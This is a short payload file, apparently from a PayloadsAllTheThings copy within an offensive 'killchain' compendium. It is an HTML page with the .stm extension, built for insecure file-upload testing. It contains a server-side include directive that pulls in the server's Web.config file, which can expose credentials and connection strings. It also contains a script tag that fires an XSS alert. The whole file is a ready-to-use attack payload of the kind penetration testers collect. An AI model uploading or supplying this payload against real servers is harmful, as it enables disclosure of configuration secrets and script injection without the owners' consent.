killchain-compendium/misc/PayloadsAllTheThings/Upload Insecure Files/Server Side Include/index.stm

<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8" />
    <title></title>
  </head>

  <body>
    <!-- #include file = "Web.config" -->
    <script>alert('XSS')</script>
  </body>

</html>